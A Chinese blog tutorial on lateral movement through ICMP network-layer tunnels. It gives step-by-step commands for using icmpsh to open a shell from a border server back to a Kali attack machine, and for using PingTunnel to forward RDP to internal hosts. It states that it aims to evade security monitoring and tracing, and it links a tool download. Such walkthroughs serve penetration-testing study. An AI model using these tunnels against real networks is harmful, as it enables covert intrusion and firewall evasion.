横向移动:隐藏通信隧道技术_网络层.(遨游于 内网任何主机)

已于 2025-04-22 02:48:46 修改
阅读量3.8k 收藏 24
点赞数 39
CC 4.0 BY-SA版权
分类专栏: # 横向渗透 领域. 文章标签: 系统安全 安全架构 安全
于 2022-04-29 18:55:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54977781/article/details/124366902
本文介绍了隧道技术在网络安全中的应用,特别是如何通过ICMP隧道和GRE隧道绕过防火墙限制进行通信。详细阐述了搭建隧道的步骤,包括内网连通性判断、网络层和传输层隧道的建立,并提供了相关工具如icmpsh和PingTunnel的使用方法。同时强调了合法合规使用这些技术的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

隧道技术的概括

隧道就是一种 绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或者端口进行封装,然后穿过防火墙,与对方进行通信。当被封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应的服务器上.

目录

常用的隧道有以下:

第一步:内网连通性判断.(判断协议能不能通过防火墙)

用 ICMP 协议进行判断有没有连通性.

第二步:搭建 网络层 隧道.

网络层:IPv6隧道、ICMP隧道、GRE隧道.(这里我演示的是 ICMP隧道.)

         利用  icmpsh  工具.

(1)外网 攻击机.(kali)

(2)边界服务器.( win 2008R2 )

         利用  PingTunnel 工具.

(1)边界服务器( kali )

(2)外网 攻击机.( kali )

(3)再开一个 计算机 进行远程连接 外网 攻击机.( kali )

当我们内网收集完信息完,就有进行下一步判断 然后做隧道通信.

(1)进出口流量是否连通的判断,是否出得去,进得来.

(2)在非受信任的网络中实现安全的数据传输.

(3)使用隐蔽的手段逃避安全监测措施和溯源追踪.

常用的隧道有以下:

网络层:IPv6隧道、ICMP隧道、GRE隧道.

传输层:TCP隧道、UDP隧道、常规端口转发.

应用层:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道.

工具下载:

隧道工具 链接:https://pan.baidu.com/s/1gD5OUcpNFnBHTYoImWCLtQ 
                     提取码:tian 

免责声明:

严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。

第一步:内网连通性判断.(判断协议能不能通过防火墙

ICMP 协议进行判断有没有连通性.

ping IP

第二步:搭建 网络层 隧道.

网络层:IPv6隧道、ICMP隧道、GRE隧道.(这里我演示的是 ICMP隧道.)

利用  icmpsh  工具.

(1)外网 攻击机.(kali)

下载 icmpsh 工具(如果下载不了 ,可以在上面的工具链接里下载.)

git clone https://github.com/inquisb/icmpsh.git

下载解压后,切换到 icmpsh 下.

cd icmpsh

安装需要 Python 库文件.

pip2 install impacket

关闭 icmp 应答,防止内核对自己的 ping 包响应.

sysctl -w net.ipv4.icmp_echo_ignore_all=1 

记得不用的时候要改回来.

sysctl -w net.ipv4.icmp_echo_ignore_all=0

搭建和 边界服务器 的隧道.

python2 icmpsh_m.py [外网的攻击机IP] [内网的主机IP]

(2)边界服务器.( win 2008R2 )

下载解压后,切换到 icmpsh 下.

cd C:\Users\icmpsh

搭建和 外网的 kali 隧道.

icmpsh.exe -t [攻击机IP]

隧道 搭建完成.( kali )

利用  PingTunnel 工具.

(1)边界服务器( kali )

解压 编译 安装.

tar zxf PingTunnel-0.72.tar.gz          
cd PingTunnel  
make && makeinstall

安装 pcap.h

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 
tar zxvf libpcap-1.9.0.tar.gz

cd libpcap-1.9.0        //切换目录
./configure

开启 隧道.

ptunnel -x bgxg         //(bgxg)是设置的隧道连接密码.

(2)外网 攻击机.( kali )

解压 编译 安装.(安装步骤 和 上面的一样.)

tar zxf PingTunnel-0.72.tar.gz          
cd PingTunnel  
make && makeinstall

安装 pcap.h

wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz 
tar zxvf libpcap-1.9.0.tar.gz

cd libpcap-1.9.0        //切换目录
./configure

隧道 连接.(边界服务器为跳板,跳到内网别的主机上.)

ptunnel -p (边界服务器IP地址) -lp 1080 -da (转发到内网的其他主机的IP) -dp 3389 -x (隧道的连接密码)

参数说明:
-x 指定 icmp 隧道连接验证密码
-lp 指定要监听的本地 tcp 端口
-da 指定要转发到的机器的 ip 地址
-dp 指定要转发到的机器的 tcp 端口
-p  指定icmp隧道另一端机器的 ip 地址

(3)再开一个 计算机 进行远程连接 外网 攻击机.( kali )

按下 win+r 打开运行,然后输入 mstsc 回车确认打开远程桌面连接面板.(记得要连接内网主机的3389端口用开才行.)

     

参考链接:【渗透测试】ICMP隧道技术之icmpsh使用_久违 °的博客-CSDN博客_icmpsh

评论 17
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半个西瓜.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值